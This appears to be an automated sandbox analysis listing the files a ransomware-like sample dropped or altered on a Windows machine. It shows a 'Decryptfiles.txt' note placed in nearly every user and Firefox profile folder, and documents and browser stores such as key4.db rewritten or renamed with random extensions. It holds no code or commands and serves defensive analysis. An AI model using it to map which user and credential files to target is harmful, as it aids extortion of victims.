C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832123.3eb2db8e-f770-4c52-9d7b-27180bea4925.main.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486832124.b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c.first-shutdown.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838393.b7b7301e-d32e-49f7-b138-9fd21cf2ca6b.health.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838409.7e03a685-c52e-4810-b494-0f433b33ac49.event.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838410.75265401-2d75-4127-a70f-7d6e61df69a0.health.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\1696486838415.86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca.main.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\2023-10\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\archived\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\db\data.safe.bin
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\background-update
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\events\events
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\4db4139f-6dcf-40ae-89c1-1ca4ca5a35ed
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\8940dc38-b85f-4355-b090-8e4e300a9627
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b38522d7-1787-4855-a312-c27916e30610
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\b3e287d1-bcec-4242-9158-4e1296363490
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\d3698c60-da91-4f8c-b7c7-e14b40be8bb1
|
DOS executable (COM)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\d3698c60-da91-4f8c-b7c7-e14b40be8bb1.hmSR
(copy)
|
DOS executable (COM)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\pending_pings\dd74a7e7-e73b-4ab9-8964-ca5c53c60966
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\glean\tmp\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\session-state.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\datareporting\state.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extension-preferences.json
|
zlib compressed data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extensions.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-wal.jKAH
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\minidumps\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\parent.lock.nSoU
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txt
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal.OceF
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\3eb2db8e-f770-4c52-9d7b-27180bea4925
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\4cb4db2a-ee68-4128-8ff4-f04bdc710c24
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\75265401-2d75-4127-a70f-7d6e61df69a0
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\7e03a685-c52e-4810-b494-0f433b33ac49
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6281059-34c6-49d8-97c7-24de33b104ab
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\saved-telemetry-pings\b7b7301e-d32e-49f7-b138-9fd21cf2ca6b
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\security_state\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\previous.jsonlz4
|
SysEx File -
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\.metadata-v2
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.BYlE
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.IfAC
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.MWJn
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.MyAb
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.lNRa
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.tsPL
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\to-be-removed\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\times.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shm
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-wal.WNUc
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\xulstore.json.Hcif
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\_curlrc.KgUE
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\56079431-ea46-4833-94f9-1ff5658cdb1c\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\61f56613-c62c-4b17-84dd-62b60d5776aa\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\6d9d9777-7ded-4768-8191-9a707d72b009\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\com.adobe.dunamis\f2eb6c79-671d-4de2-b7be-3b2eea7abc47\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Contacts\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\AQRFEVRTGL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\EEGWXUHVUG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\EIVQSAOTAQ.jpg
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Desktop\EIVQSAOTAQ.jpg.mkTG (copy)
|
COM executable for DOS
|
dropped
|
||
C:\Users\user\Desktop\EIVQSAOTAQ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\EOWRVPQCCS\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\GIGIYTFFYT.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\JDDHMPCDUJ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\NOTIFICATION_OF_DEPENDANTS.vbs
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\NVWZAPQSQL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\EIVQSAOTAQ.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\PIVFAGEAAV\ZIPXYXWIOY.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\PWCCAWLGRE\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA.docx
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\QCFWYSKMHA\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\GIGIYTFFYT.mp3
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\PALRGUCVEH.jpg
|
DOS executable (COM, 0x8C-variant)
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\PALRGUCVEH.jpg.xSqw (copy)
|
DOS executable (COM, 0x8C-variant)
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\SQSJKEBWDT.xlsx
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Desktop\SUAVTZKNFL\ZGGKNSUKOP.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Desktop\UNKRLCVOHV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\ZIPXYXWIOY\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\AQRFEVRTGL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Documents\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\EEGWXUHVUG\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\EIVQSAOTAQ.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\EIVQSAOTAQ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\EOWRVPQCCS\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\GIGIYTFFYT.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\JDDHMPCDUJ\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\NVWZAPQSQL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.jpg
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\PALRGUCVEH.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\PIVFAGEAAV\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PALRGUCVEH.mp3
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\Documents\PWCCAWLGRE\PWCCAWLGRE.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\PIVFAGEAAV.jpg
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\PWCCAWLGRE.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\QCFWYSKMHA\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\SQSJKEBWDT.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\GIGIYTFFYT.mp3
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\SQSJKEBWDT.xlsx
|
data
|
dropped
|
||
C:\Users\user\Documents\SUAVTZKNFL\SUAVTZKNFL.docx
|
data
|
dropped
|
||
C:\Users\user\Documents\TQDFJHPUIU.png
|
data
|
dropped
|
||
C:\Users\user\Documents\UNKRLCVOHV\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Documents\ZIPXYXWIOY\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Downloads\BNAGMGSPLO.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Downloads\EFOYFBOLXA.pdf
|
data
|
dropped
|
||
C:\Users\user\Downloads\EIVQSAOTAQ.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\GIGIYTFFYT.mp3
|
OpenPGP Secret Key Version 2
|
dropped
|
||
C:\Users\user\Downloads\GRXZDKKVDB.png
|
data
|
dropped
|
||
C:\Users\user\Downloads\NVWZAPQSQL.jpg
|
data
|
dropped
|
||
C:\Users\user\Downloads\NVWZAPQSQL.xlsx
|
data
|
dropped
|
||
